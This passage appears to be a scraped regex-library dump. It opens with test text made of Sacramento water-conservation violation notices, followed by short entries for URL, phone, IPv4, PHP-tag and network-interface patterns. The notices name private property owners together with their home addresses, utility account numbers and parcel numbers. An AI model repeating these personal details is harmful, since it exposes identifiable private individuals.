6/26/2015, at 1 SAND PEBBLE CT, a City Water Conservation Representative observed the following violation(s) of the City’s Water Conservation Ordinance: X Gutter or Pavement Flooding (SCC§13.04.860) □ Flooding Neighbor (SCC§ 13.04.860) □ Watering Wrong Time (SCC§ 13.04.870) □ Watering Wrong Day (SCC§ 13.04.870) □ Leaking or Faulty Water Fixture(s) (SCC§ 13.04.850) □ Washing Vehicle on Wrong Day (SCC§ 13.04.870) □ Washing Vehicle Without Shut-Off Nozzle (SCC§ 13.04.870) □ Washing Down Paved Area (SCC§ 13.04.870) Sacramento City Code Section 13.04.890 imposes penalties for violations of the City’s Water Conservation Ordinance. Whether the violation is committed by the owner of the premises, or by the occupant (if different than the owner), the penalty amount is included on the owner’s bill for water service provided to the premises where the violation occurred. Page | 2 of 2 The penalty that applies to the violation(s) observed at the above address on 6/26/2015 is checked below: X First violation during a twelve (12) month period: No penalty. □ Second violation during a twelve (12) month period: The penalty is fifty dollars ($50.00). However, this penalty will be waived if the owner, or the occupant (if different than the owner, and the occupant committed the violation) attends a Water Conservation Seminar offered by the City’s Department of Utilities within sixty (60) days after the date of this penalty notice. □ Third violation during a twelve (12) month period: The penalty is two hundred dollars ($200.00). □ Fourth violation and any successive violations during a twelve (12) month period: The penalty is one thousand dollars ($1000.00). The owner or occupant of the premises where the violation(s) occurred may appeal this Notice of Violation by filing a written notice of appeal no later than 30 days from the date of this letter. Please send all appeals to the City’s Director of Utilities at 1395 35th Ave, Sacramento, CA 95822 in accordance with the provisions of Sacramento City Code Section 13.04.900. The notice of appeal must specify the grounds for appeal and provide the address and telephone number of the person filing the appeal. Further information concerning the City’s water conservation requirements and programs, including a link to the Sacramento City Code provisions cited in this Notice, may be viewed on the internet at www.sparesacwater.org. Our website also contains information about free services available to help you manage your water use, such as a Free Water Wise House Call. With this free service, a trained Water Conservation Specialist will visit your home or business to identify potential water savings. We encourage you to take advantage of this service. If you have any further questions, please call 311 or (916) 264-5011. During Daylight Saving Time (March 8 – November 2) water TWO days per week, based on your address number. Addresses ending in odd numbers water Tues. and Sat., addresses ending in even numbers water Weds. and Sun. – always before 10am and after 7pm. Thank you, City of Sacramento Department of Utilities, Water Conservation Office Page | 1 of 2 MARLIS WENDY JANG KOBASHI TRUST 2011 1 SIX RIVERS CR SACRAMENTO, CA 95831 WATER CONSERVATION OFFICE 2260 GLEN ELLEN CIRCLE SACRAMENTO, CA 95822-3634 PH 916-808-5605 FAX 916-808-5655 Date: March 31, 2015 Notice of Violation Outdoor Water Conservation Requirements Property Owner: MARLIS WENDY JANG KOBASHI TRUST 2011 Address: 1 SIX RIVERS CR Account: 364644000 Parcel: 031-0250-051-0000 Dear Customer: On, 3/26/2015, at 1 SIX RIVERS CR, a City Water Conservation Representative observed the following violation(s) of the City’s Water Conservation Ordinance: X Gutter or Pavement Flooding (SCC§13.04.860) □ Flooding Neighbor (SCC§ 13.04.860) □ Watering Wrong Time (SCC§ 13.04.870) X Watering Wrong Day (SCC§ 13.04.870) □ Leaking or Faulty Water Fixture(s) (SCC§ 13.04.850) □ Washing Vehicle on Wrong Day (SCC§ 13.04.870) □ Washing Vehicle Without Shut-Off Nozzle (SCC§ 13.04.870) □ Washing Down Paved Area (SCC§ 13.04.870) Sacramento City Code Section 13.04.890 imposes penalties for violations of the City’s Water Conservation Ordinance. Whether the violation is committed by the owner of the premises, or by the occupant (if different than the owner), the penalty amount is included on the owner’s bill for water service provided to the premises where the violation occurred. Page | 2 of 2 The penalty that applies to the violation(s) observed at the above address on 3/26/2015 is checked below: X First violation during a twelve (12) month period: No penalty. □ Second violation during a twelve (12) month period: The penalty is fifty dollars ($50.00). However, this penalty will be waived if the owner, or the occupant (if different than the owner, and the occupant committed the violation) attends a Water Conservation Seminar offered by the City’s Department of Utilities within sixty (60) days after the date of this penalty notice. □ Third violation during a twelve (12) month period: The penalty is two hundred dollars ($200.00). □ Fourth violation and any successive violations during a twelve (12) month period: The penalty is one thousand dollars ($1000.00). The owner or occupant of the premises where the violation(s) occurred may appeal this Notice of Violation by filing a written notice of appeal no later than 30 days from the date of this letter. Please send all appeals to the Water Conservation Office at 2260 Glen Ellen Cir., Sacramento, CA 95822, in accordance with the provisions of Sacramento City Code Section 13.04.900. The notice of appeal must specify the grounds for appeal and provide the address and telephone number of the person filing the appeal. Further information concerning the City’s water conservation requirements and programs, including a link to the Sacramento City Code provisions cited in this Notice, may be viewed on the internet at www.sparesacwater.org. Our website also contains information about free services available to help you manage your water use, such as a Free Water Wise House Call. With this free service, a trained Water Conservation Specialist will visit your home or business to identify potential water savings. We encourage you to take advantage of this service. If you have any further questions, please call 311 or (916) 264-5011. During Daylight Saving Time (March 8 – November 2) water TWO days per week, based on your address number. Addresses ending in odd numbers water Tues. and Sat., addresses ending in even numbers water Weds. and Sun. – always before 10am and after 7pm. Thank you, City of Sacramento Department of Utilities, Water Conservation Office Page | 1 of 2 MCKINNEY,ELIZABETH ANNE 2 KINGBIRD CT SACRAMENTO, CA 95831 WATER CONSERVATION OFFICE 2260 GLEN ELLEN CIRCLE SACRAMENTO, CA 95822-3634 PH 916-808-5605 FAX 916-808-5655 Date: April 29, 2015 Notice of Violation Outdoor Water Conservation Requirements Property Owner: MCKINNEY,ELIZABETH ANNE Address: 2 KINGBIRD CT Account: 7728344000 Parcel: 031-0370-054-0000 Dear Customer: On, 4/20/2015, at 2 KINGBIRD CT, a City Water Conservation Representative observed the following violation(s) of the City’s Water Conservation Ordinance: X Gutter or Pavement Flooding (SCC§13.04.860) □ Flooding Neighbor (SCC§ 13.04.860) □ Watering Wrong Time (SCC§ 13.04.870) X Watering Wrong Day (SCC§ 13.04.870) □ Leaking or Faulty Water Fixture(s) (SCC§ 13.04.850) □ Washing Vehicle on Wrong Day (SCC§ 13.04.870) □ Washing Vehicle Without Shut-Off Nozzle (SCC§ 13.04.870) □ Washing Down Paved Area (SCC§ 13.04.870) Sacramento City Code Section 13.04.890 imposes penalties for violations of the City’s Water Conservation Ordinance. Whether the violation is committed by the owner of the premises, or by the occupant (if different than the owner), the penalty amount is included on the owner’s bill for water service provided to the premises where the violation occurred. Page | 2 of 2 The penalty that applies to the violation(s) observed at the above address on 4/20/2015 is checked below: X First violation during a twelve (12) month period: No penalty. □ Second violation during a twelve (12) month period: The penalty is fifty dollars ($50.00). However, this penalty will be waived if the owner, or the occupant (if different than the owner, and the occupant committed the violation) attends a Water Conservation Seminar offered by the City’s Department of Utilities within sixty (60) days after the date of this penalty notice. □ Third violation during a twelve (12) month period: The penalty is two hundred dollars ($200.00). □ Fourth violation and any successive violations during a twelve (12) month period: The penalty is one thousand dollars ($1000.00). The owner or occupant of the premises where the violation(s) occurred may appeal this Notice of Violation by filing a written notice of appeal no later than 30 days from the date of this letter. Please send all appeals to the Water Conservation Office at 2260 Glen Ellen Cir., Sacramento, CA 95822, in accordance with the provisions of Sacramento City Code Section 13.04.900. The notice of appeal must specify the grounds for appeal and provide the address and telephone number of the person filing the appeal. Further information concerning the City’s water conservation requirements and programs, including a link to the Sacramento City Code provisions cited in this Notice, may be viewed on the internet at www.sparesacwater.org. Our website also contains information about free services available to help you manage your water use, such as a Free Water Wise House Call. With this free service, a trained Water Conservation Specialist will visit your home or business to identify potential water savings. We encourage you to take advantage of this service. If you have any further questions, please call 311 or (916) 264-5011. During Daylight Saving Time (March 8 – November 2) water TWO days per week, based on your address number. Addresses ending in odd numbers water Tues. and Sat., addresses ending in even numbers water Weds. and Sun. – always before 10am and after 7pm. Thank you, City of Sacramento Department of Utilities, Water Conservation Office Page | 1 of 2 GRIFFIN,ROBERT E 4 KEELING CT SACRAMENTO, CA 95823 WATER CONSERVATION OFFICE 2260 GLEN ELLEN CIRCLE SACRAMENTO, CA 95822-3634 PH 916-808-5605 FAX 916-808-5655 Date: June 1, 2015 Notice of Violation Outdoor Water Conservation Requirements Property Owner: GRIFFIN,ROBERT E Address: 4 KEELING CT Account: 5514844000 Parcel: 117-0970-103-0000 Dear Customer: On, 5/28/2015, at 4 KEELING CT, a City Water Conservation Representative observed the following violation(s) of the City’s Water Conservation Ordinance: X Gutter or Pavement Flooding (SCC§13.04.860) □ Flooding Neighbor (SCC§ 13.04.860) □ Watering Wrong Time (SCC§ 13.04.870) X Watering Wrong Day (SCC§ 13.04.870) □ Leaking or Faulty Water Fixture(s) (SCC§ 13.04.850) □ Washing Vehicle on Wrong Day (SCC§ 13.04.870) □ Washing Vehicle Without Shut-Off Nozzle (SCC§ 13.04.870) □ Washing Down Paved Area (SCC§ 13.04.870) Sacramento City Code Section 13.04.890 imposes penalties for violations of the City’s Water Conservation Ordinance. Whether the violation is committed by the owner of the premises, or by the occupant (if different than the owner), the penalty amount is included on the owner’s bill for water service provided to the premises where the violation occurred. Page | 2 of 2 The penalty that applies to the violation(s) observed at the above address on 5/28/2015 is checked below: □ First violation during a twelve (12) month period: No penalty. X Second violation during a twelve (12) month period: The penalty is fifty dollars ($50.00). However, this penalty will be waived if the owner, or the occupant (if different than the owner, and the occupant committed the violation) attends a Water Conservation Seminar offered by the City’s Department of Utilities within sixty (60) days after the date of this penalty notice. □ Third violation during a twelve (12) month period: The penalty is two hundred dollars ($200.00). □ Fourth violation and any successive violations during a twelve (12) month period: The penalty is one thousand dollars ($1000.00). The owner or occupant of the premises where the violation(s) occurred may appeal this Notice of Violation by filing a written notice of appeal no later than 30 days from the date of this letter. Please send all appeals to the City’s Director of Utilities at 1395 35th Ave, Sacramento, CA 95822 in accordance with the provisions of Sacramento City Code Section 13.04.900. The notice of appeal must specify the grounds for appeal and provide the address and telephone number of the person filing the appeal. Further information concerning the City’s water conservation requirements and programs, including a link to the Sacramento City Code provisions cited in this Notice, may be viewed on the internet at www.sparesacwater.org. Our website also contains information about free services available to help you manage your water use, such as a Free Water Wise House Call. With this free service, a trained Water Conservation Specialist will visit your home or business to identify potential water savings. We encourage you to take advantage of this service. If you have any further questions, please call 311 or (916) 264-5011. During Daylight Saving Time (March 8 – November 2) water TWO days per week, based on your address number. Addresses ending in odd numbers water Tues. and Sat., addresses ending in even numbers water Weds. and Sun. – always before 10am and after 7pm. Thank you, City of Sacramento Department of Utilities, Water Conservation Office Page | 1 of 2 SPENCER,ZACHARY B 4 VESTRY CT SACRAMENTO, CA 95835 WATER CONSERVATION OFFICE 2260 GLEN ELLEN CIRCLE SACRAMENTO, CA 95822-3634 PH 916-808-5605 FAX 916-808-5655 Date: March 2, 2015 Notice of Violation Outdoor Water Conservation Requirements Property Owner: SPENCER,ZACHARY B Address: 4 VESTRY CT Account: 6205648708 Parcel: 225-1140-050-0000 Dear Customer: On, 3/2/2015, at 4 VESTRY CT, a City Water Conservation Representative observed the following violation(s) of the City’s Water Conservation Ordinance: X Gutter or Pavement Flooding (SCC§13.04.860) □ Flooding Neighbor (SCC§ 13.04.860) □ Watering Wrong Time (SCC§ 13.04.870) □ Watering Wrong Day (SCC§ 13.04.870) □ Leaking or Faulty Water Fixture(s) (SCC§ 13.04.850) □ Washing Vehicle on Wrong Day (SCC§ 13.04.870) □ Washing Vehicle Without Shut-Off Nozzle (SCC§ 13.04.870) □ Washing Down Paved Area (SCC§ 13.04.870) Sacramento City Code Section 13.04.890 imposes penalties for violations of the City’s Water Conservation Ordinance. Whether the violation is committed by the owner of the premises, or by the occupant (if different than the owner), the penalty amount is included on the owner’s bill for water service provided to the premises where the violation occurred. Page | 2 of 2 The penalty that applies to the violation(s) observed at the above address on 3/2/2015 is checked below: X First violation during a twelve (12) month period: No penalty. □ Second violation during a twelve (12) month period: The penalty is fifty dollars ($50.00). However, this penalty will be waived if the owner, or the occupant (if different than the owner, and the occupant committed the violation) attends a Water Conservation Seminar offered by the City’s Department of Utilities within sixty (60) days after the date of this penalty notice. □ Third violation during a twelve (12) month period: The penalty is two hundred dollars ($200.00). □ Fourth violation and any successive violations during a twelve (12) month period: The penalty is one thousand dollars ($1000.00). The owner or occupant of the premises where the violation(s) occurred may appeal this Notice of Violation by filing a written notice of appeal
Test File
2015-09-23T15:51:01.000Z
Parse full URL and find parts
(?:([A-Za-z]+):\/\/)?(?:([A-Za-z0-9]+)\:([A-Za-z0-9]+)\@)?((?:[A-Za-z0-9]+\.)+[A-Za-z0-9]+)(?:\:([0-9]+))?(?:\/((?:[A-Za-z0-9]+)(?:\/[A-Za-z0-9]+)*(?:\.[A-Za-z0-9]+)?)?(\?[A-Za-z0-9]+=[A-Za-z0-9]+(?:&[A-Za-z0-9]+=[A-Za-z0-9]+)*)?(?:#([A-Za-z0-9]+))?)?
http://root:[email protected]:80/search/wtf?qqqq=123&www=456#result http://google.com/page/page.html http://www.google.com/page?qqqq=123 omg.wtf.google.com/page/page.wtf?qqqq=123&eee=455&4444=445 lol.com/page#anchor lol.com/page.php#ancohr wtf.omg/?param=value wtf.omg/#anchor root:[email protected]/page.php#anchor root:[email protected]/?param=233#anchor
URL parser RegEx
2015-09-08T19:11:19.000Z
^\s*([a-zàèéìòù]+)??(?:\s+)?([a-zàèéìòù]+)??\s*(['-])?\s*([a-zàèéìòù]+)\s*$
Nome (facoltativo) e cognome italiano
2020-07-25T21:29:05.000Z
m3u8-ffzy
#E.*?\s+\w+(?:\d{15}|1o\d{3})\.ts\s+
#EXTINF:4.421078, df84003b986000147.ts #EXTINF:4.170833, df84003b986000148.ts #EXT-X-DISCONTINUITY #EXTINF:7.300000, df116977773071061.ts #EXTINF:3.100000, df116977773071062.ts #EXTINF:3.333333, df116977773071063.ts #EXTINF:3.266667, df116977773071064.ts #EXTINF:4.100000, df116977773071065.ts #EXTINF:3.966667, df116977773071066.ts #EXT-X-DISCONTINUITY #EXTINF:4.170833, df84003b986000149.ts #EXTINF:3.378378, df84003b986000150.ts --- #EXTINF:5.213533, 3fddafe3aa9000146.ts #EXTINF:6.464800, 3fddafe3aa9000147.ts #EXTINF:0.667333, 3fddafe3aa9000148.ts #EXT-X-DISCONTINUITY #EXTINF:7.400000, 3fddafe3aa901o355.ts #EXTINF:3.000000, 3fddafe3aa901o356.ts #EXTINF:3.720000, 3fddafe3aa901o357.ts #EXTINF:2.880000, 3fddafe3aa901o358.ts #EXTINF:4.760000, 3fddafe3aa901o359.ts #EXTINF:3.320000, 3fddafe3aa901o360.ts #EXT-X-DISCONTINUITY #EXTINF:4.170833, 3fddafe3aa9000149.ts #EXTINF:5.922578, 3fddafe3aa9000150.ts #EXTINF:1.501500, 3fddafe3aa9000151.ts #EXTINF:5.547211, 3fddafe3aa9000152.ts
m3u8-ffzy
2023-11-13T03:50:46.000Z
Repeating numbers (11111,22222,333333)
\b(\d)\1+\b
Repeating numbers
2016-03-09T13:31:09.000Z
ipv4 address matching
(?:[\d]{1,3})\.(?:[\d]{1,3})\.(?:[\d]{1,3})\.(?:[\d]{1,3})
hddhkc 192.168.1.1 gfjfhfv 174.45.1.1
https://regex101.com/r/lS4dV7/1
2015-09-04T05:48:19.000Z
match php tag
(?<![\=\"])<\?(php|\s+|\=)(.+?)\?>
<strong> <?= $row['name']; ?> </strong> href="<?= $row['url']; ?>"
match php tag
2023-11-01T12:50:51.000Z
<a href='(http:\/\/store\.steampowered\.com\/app\/\d+\/)'>
Today's Deal: Save 50% on <a href='http://store.steampowered.com/app/234270/'>Ken Follett's The Pillars of the Earth</a>!*<br><br>Look for the deals each day on the front page of Steam. Or follow us on <a href='http://twitter.com/steam_games'>twitter</a> or <a href='http://www.facebook.com/Steam'>Facebook</a> for instant notifications wherever you are!<br><br>*Offer ends Friday at 10AM Pacific Time<br><a href=\"http://store.steampowered.com/app/234270/\"><img src=\"https://steamcdn-a.akamaihd.net/steam/apps/234270/capsule_467x181.jpg\" style=\" float: left; margin-right: 12px; height: 181px; width: 467px;\"></a>
wqdwqd
2017-12-13T23:18:14.000Z
<xxxx\b[^<]*(?:(?!<\/yyyy>)<[^<]*)*<\/yyyy>
<link rel='stylesheet' id='social-logos-css' href='https://www.markmallett.com/blog/wp-content/plugins/jetpack/_inc/social-logos/social-logos.min.css?ver=1' type='text/css' media='all' /> <link rel='stylesheet' id='jetpack_css-css' href='https://www.markmallett.com/blog/wp-content/plugins/jetpack/css/jetpack.css?ver=6.5' type='text/css' media='all' /> <script type='text/javascript' src='https://www.markmallett.com/blog/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script> <script type='text/javascript' src='https://www.markmallett.com/blog/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script> <script type='text/javascript' src='https://www.markmallett.com/blog/wp-content/plugins/footnotes/class/../js/jquery.tools.min.js?ver=4.9.8'></script> <script type='text/javascript' src='https://www.markmallett.com/blog/wp-content/plugins/add-to-any/addtoany.min.js?ver=1.0'></script> <script type='text/javascript'> var mejsL10n = {"language":"en","strings":{"mejs.install-flash":"You are using a browser that does not have Flash player enabled or installed. Please turn on your Flash player plugin or download the latest version from https:\/\/get.adobe.com\/flashplayer\/","mejs.fullscreen-off":"Turn off Fullscreen","mejs.fullscreen-on":"Go Fullscreen","mejs.download-video":"Download Video","mejs.fullscreen":"Fullscreen","mejs.time-jump-forward":["Jump forward 1 second","Jump forward %1 seconds"],"mejs.loop":"Toggle Loop","mejs.play":"Play","mejs.pause":"Pause","mejs.close":"Close","mejs.time-slider":"Time Slider","mejs.time-help-text":"Use Left\/Right Arrow keys to advance one second, Up\/Down arrows to advance ten seconds.","mejs.time-skip-back":["Skip back 1 second","Skip back %1 seconds"],"mejs.captions-subtitles":"Captions\/Subtitles","mejs.captions-chapters":"Chapters","mejs.none":"None","mejs.mute-toggle":"Mute Toggle","mejs.volume-help-text":"Use Up\/Down Arrow keys to increase or decrease volume.","mejs.unmute":"Unmute","mejs.mute":"Mute","mejs.volume-slider":"Volume Slider","mejs.video-player":"Video Player","mejs.audio-player":"Audio Player","mejs.ad-skip":"Skip ad","mejs.ad-skip-info":["Skip in 1 second","Skip in %1 seconds"],"mejs.source-chooser":"Source Chooser","mejs.stop":"Stop","mejs.speed-rate":"Speed Rate","mejs.live-broadcast":"Live Broadcast","mejs.afrikaans":"Afrikaans","mejs.albanian":"Albanian","mejs.arabic":"Arabic","mejs.belarusian":"Belarusian","mejs.bulgarian":"Bulgarian","mejs.catalan":"Catalan","mejs.chinese":"Chinese","mejs.chinese-simplified":"Chinese (Simplified)","mejs.chinese-traditional":"Chinese (Traditional)","mejs.croatian":"Croatian","mejs.czech":"Czech","mejs.danish":"Danish","mejs.dutch":"Dutch","mejs.english":"English","mejs.estonian":"Estonian","mejs.filipino":"Filipino","mejs.finnish":"Finnish","mejs.french":"French","mejs.galician":"Galician","mejs.german":"German","mejs.greek":"Greek","mejs.haitian-creole":"Haitian Creole","mejs.hebrew":"Hebrew","mejs.hindi":"Hindi","mejs.hungarian":"Hungarian","mejs.icelandic":"Icelandic","mejs.indonesian":"Indonesian","mejs.irish":"Irish","mejs.italian":"Italian","mejs.japanese":"Japanese","mejs.korean":"Korean","mejs.latvian":"Latvian","mejs.lithuanian":"Lithuanian","mejs.macedonian":"Macedonian","mejs.malay":"Malay","mejs.maltese":"Maltese","mejs.norwegian":"Norwegian","mejs.persian":"Persian","mejs.polish":"Polish","mejs.portuguese":"Portuguese","mejs.romanian":"Romanian","mejs.russian":"Russian","mejs.serbian":"Serbian","mejs.slovak":"Slovak","mejs.slovenian":"Slovenian","mejs.spanish":"Spanish","mejs.swahili":"Swahili","mejs.swedish":"Swedish","mejs.tagalog":"Tagalog","mejs.thai":"Thai","mejs.turkish":"Turkish","mejs.ukrainian":"Ukrainian","mejs.vietnamese":"Vietnamese","mejs.welsh":"Welsh","mejs.yiddish":"Yiddish"}}; </script> <script type='text/javascript' src='https://www.markmallett.com/blog/wp-includes/js/mediaelement/mediaelement-and-player.min.js?ver=4.2.6-78496d1'></script> <xxxx type='text/javascript' src='https://www.markmallett.com/blog/wp-includes/js/mediaelement/mediaelement-migrate.min.js?ver=4.9.8'></yyyy> <script type='text/javascript'> /* <![CDATA[ */ var _wpmejsSettings = {"pluginPath":"\/blog\/wp-includes\/js\/mediaelement\/","classPrefix":"mejs-","stretching":"responsive"}; /* ]]> */ </script> <script type='text/javascript' src='https://www.markmallett.com/blog/wp-includes/js/mediaelement/wp-mediaelement.min.js?ver=4.9.8'></script> <script type='text/javascript' src='https://www.markmallett.com/blog/wp-content/plugins/audio-player-by-clammr/js/clammr-audio-player.js?ver=4.9.8'></script> <script type='text/javascript' src='https://www.markmallett.com/blog/wp-content/themes/vantage/js/jquery.flexslider.min.js?ver=2.1'></script> <script type='text/javascript' src='https://www.markmallett.com/blog/wp-content/themes/vantage/js/jquery.touchSwipe.min.js?ver=1.6.6'></script> <script type='text/javascript' src='https://www.markmallett.com/blog/wp-content/themes/vantage/js/jquery.theme-main.min.js?ver=1.7.11'></script> <!--[if lt IE 9]> <script type='text/javascript' src='https://www.markmallett.com/blog/wp-content/themes/vantage/js/html5.min.js?ver=3.7.3'></script> <![endif]--> <!--[if (gte IE 6)&(lte IE 8)]> <script type='text/javascript' src='https://www.markmallett.com/blog/wp-content/themes/vantage/js/selectivizr.min.js?ver=1.0.2'></script> <![endif]--> <script type='text/javascript'> /* <![CDATA[ */ var mobileNav = {"search":{"url":"https:\/\/www.markmallett.com\/blog","placeholder":"Search"},"text":{"navigate":"Menu","back":"Back","close":"Close"},"nextIconUrl":"https:\/\/www.markmallett.com\/blog\/wp-content\/themes\/vantage\/inc\/mobilenav\/images\/next.png","mobileMenuClose":"<i class=\"fa fa-times\"><\/i>"}; /* ]]> */ </script> <script type='text/javascript' src='https://www.markmallett.com/blog/wp-content/themes/vantage/inc/mobilenav/js/mobilenav.min.js?ver=1.7.11'></script> <link rel='https://api.w.org/' href='https://www.markmallett.com/blog/wp-json/' /> <link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://www.markmallett.com/blog/xmlrpc.php?rsd" /> <link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://www.markmallett.com/blog/wp-includes/wlwmanifest.xml" /> <link rel='prev' title='God Has a Face' href='https://www.markmallett.com/blog/2017/12/25/god-has-a-face/' /> <link rel='next' title='You Be Noah' href='https://www.markmallett.com/blog/2018/01/04/you-be-noah/' /> <meta name="generator" content="WordPress 4.9.8" /> <link rel='shortlink' href='https://wp.me/p8tvP8-8tm' /> <link rel="alternate" type="application/json+oembed" href="https://www.markmallett.com/blog/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.markmallett.com%2Fblog%2F2018%2F01%2F02%2Fthe-relics-and-the-message%2F" /> <link rel="alternate" type="text/xml+oembed" href="https://www.markmallett.com/blog/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.markmallett.com%2Fblog%2F2018%2F01%2F02%2Fthe-relics-and-the-message%2F&#038;format=xml" />
remove private tag <xxxx> </yyyy>
2018-09-17T15:10:03.000Z
^[0-9\)\(\s+-]+(\s?(?:x|extension|ext\.)\s?[0-9-]+)?$
555-555-5555 555-555-5555 x55555 555-555-5555x55555 555-555-5555 extension 55555 555-555-5555 ext. 55555 (555) 555-5555 5555555555 555-5555 5555555 1-800-CONTACTS 1-800-555-5555 Hello world (555-555-5555 0-999-0349300 +43 984-899-46515 +43 some bogus 939403 03904 aosdf
phone w/ extension
2016-02-09T08:50:03.000Z
This pattern check three words with a dot separator betwwern words. It use unicode; It is not yest compatible with javascript
^\p{L}+\.\p{L}+\.\p{L}+$
index.home.raft
what3words
2015-07-21T13:22:04.000Z
Bob answers 'Whoa, chill out!' if you yell at him. You can use this regex to match regexes like "WHAT THE HELL WERE YOU THINKING?"
(.*(!)$)|([^a-z])+(\?)$
How are you?
Regex to match sentences that sound like yelling
2015-06-26T18:56:03.000Z
Looks for sides
(S[WE]+N)|(N[WE]+S)|(W[NS]+E)|(E[NS]+W)
SNEEESNEEWWNNEENSWWNNWSSWWNNSSSS
Sides
2015-09-25T21:40:05.000Z
multiline input with tagged
\[content\]([\s\S]*?)\[\/content\]
my regex for multiline
2015-11-24T00:32:28.000Z
For this task, I did not need inet6 (IPv6 stuff), so I left it out. The regex in its current state does not allow for that to be included without manually adding the entire second part
\d: ([\w@]+): <(.+)> mtu (\d+) qdisc (\w+) qlen (\d+)\n[ ]+(\w+\/\w+) ([\d:\w.]+) brd ([\d:\w.]+)\n?(?:(?: )+inet6? ([\d.:\/]+) (?:brd ([\d:\w.]+) )?scope (\w+) (?:\w+)?\n(?: )+valid_lft (\w+) preferred_lft (\w+))?
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue qlen 1 link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 inet 127.0.0.1/8 scope host lo valid_lft forever preferred_lft forever inet6 ::1/128 scope host valid_lft forever preferred_lft forever 2: lan1: <BROADCAST,MULTICAST,UP,LOWER_UP8000> mtu 1500 qdisc mq qlen 1000 link/ether 00:60:e0:6a:48:26 brd ff:ff:ff:ff:ff:ff inet 10.32.39.55/24 brd 10.32.39.255 scope global lan1 valid_lft forever preferred_lft forever 3: lan2: <BROADCAST,MULTICAST,UP,LOWER_UP8000> mtu 1500 qdisc mq qlen 1000 link/ether 00:60:e0:6a:48:27 brd ff:ff:ff:ff:ff:ff inet 192.168.90.1/20 brd 192.168.95.255 scope global lan2 valid_lft forever preferred_lft forever 4: sit0@NONE: <NOARP> mtu 1480 qdisc noop qlen 1 link/sit 0.0.0.0 brd 0.0.0.0 6: wwp0s29u1u3i12: <BROADCAST,MULTICAST,NOARP,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast qlen 1000 link/ether 00:00:11:12:13:14 brd ff:ff:ff:ff:ff:ff inet 172.16.224.124/16 brd 172.16.255.255 scope global wwp0s29u1u3i12 valid_lft forever preferred_lft forever
Regex to group output of $(ip addr) interface
2018-06-21T22:05:25.000Z
Regex til at matche folkeskoleklasse input. Matcher et tal fra 1 - 10, derefter et eller flere mellemrum evt. efterfulgt af et punktum eller et punktum derefter efterfulgt af et eller flere mellemrum og til sidst et enkelt bogstav (stort eller lille).
^(\d0?)(([ +]|\.)?)+[a-zA-Z]$
1b 2B 3 b 1 B 5.b 1.B 1. b 1. B 1 .b 10a 10A 10 a 10 A 10.a 10.A 10. a 10. A a10. b asd 1 5. 6 a B 11.a 11@ 9.abc
Folkeskoleklasse
2016-04-07T20:49:16.000Z
testing
^[^-]{8}-[^-]{3}-[^-]{3}$
dbcdefgh-333-333
testing
2015-09-11T08:03:19.000Z